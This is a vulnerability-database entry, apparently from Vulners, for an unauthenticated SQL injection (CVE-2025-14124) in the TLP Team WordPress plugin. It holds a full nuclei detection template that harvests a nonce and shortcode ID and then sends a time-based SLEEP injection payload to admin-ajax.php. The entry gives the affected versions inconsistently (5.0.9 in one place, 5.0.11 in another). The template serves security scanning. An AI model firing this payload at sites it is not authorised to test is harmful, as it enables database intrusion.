Lucene search
K

Team WordPress Plugin (TLP Team) <= 5.0.9 - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Team WordPress Plugin up to version 5.0.11 has unauthenticated SQL injection via AJAX.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-14124
9 Jan 202620:19
githubexploit
Circl
CVE-2025-14124
5 Jan 202608:34
circl
CNNVD
WordPress plugin Team 安全漏洞
5 Jan 202600:00
cnnvd
CVE
CVE-2025-14124
5 Jan 202606:00
cve
Cvelist
CVE-2025-14124 Team < 5.0.11 - Unauthenticated SQLi
5 Jan 202606:00
cvelist
EUVD
EUVD-2026-0837
5 Jan 202606:00
euvd
NVD
CVE-2025-14124
5 Jan 202606:16
nvd
Patchstack
WordPress Team plugin < 5.0.11 - Unauthenticated SQLi vulnerability
5 Jan 202607:05
patchstack
Positive Technologies
PT-2026-1214
5 Jan 202600:00
ptsecurity
RedhatCVE
CVE-2025-14124
6 Jan 202606:07
redhatcve
Rows per page
id: CVE-2025-14124

info:
  name: Team WordPress Plugin (TLP Team) <= 5.0.9 - SQL Injection
  author: neosmith1,0x_Akoko
  severity: high
  description: |
    Team WordPress plugin <= 5.0.11 contains a SQL injection caused by improper sanitization and escaping of a parameter in an AJAX action accessible to unauthenticated users, letting remote attackers execute arbitrary SQL commands.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
  remediation: |
   Update to version 5.0.11 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tlp-team/team-509-unauthenticated-sql-injection
    - https://plugins.trac.wordpress.org/changeset/3276890/tlp-team
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2025-14124
    epss-score: 0.0156
    epss-percentile: 0.72237
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 5
    vendor: jeweltheme
    product: tlp-team
    fofa-query: body="tlp-team" || body="rt-team-container"
    shodan-query: http.html:"tlp-team"
  tags: cve,cve2025,sqli,wordpress,wp,wp-plugin,tlp-team

flow: http(1) && (http(2) || http(3)) && http(4) && http(5)

http:
  - raw:
      - |
        GET /wp-content/plugins/tlp-team/assets/css/tlpteam.css HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - raw:
      - |
        GET /wp-json/wp/v2/posts?per_page=100&search=team HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: post_id
        group: 1
        regex:
          - '"id":(\d+),"date"'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "rt-team-container")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-json/wp/v2/pages?per_page=100&search=team HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: post_id
        group: 1
        regex:
          - '"id":(\d+),"date"'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "rt-team-container")
        condition: and
        internal: true

  - raw:
      - |
        GET /?p={{post_id}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'var\s+ttp\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-z0-9]+)"'
        internal: true

      - type: regex
        name: sc_id
        group: 1
        regex:
          - "data-sc-id='([0-9]+)'"
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "rt-team-container")
          - nonce != ""
          - sc_id != ""
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 25s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ttp_Layout_Ajax_Action&search=%27+AND+(SELECT+1+FROM+(SELECT+SLEEP(6))x)+AND+%271&tlp_nonce={{nonce}}&scID={{sc_id}}

    matchers:
      - type: dsl
        dsl:
          - duration >= 6
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100effa7f97cfaa5d1350149fc8da3f6b13c5329f0e30840a257f4bfaa2c2770cea022100f0b4c1c83957acdbee223cb05b3096f1b9fbf5d65ec45a19161947f8c5d65e54:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Apr 2026 04:03Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.18.6
EPSS0.0156
SSVC
13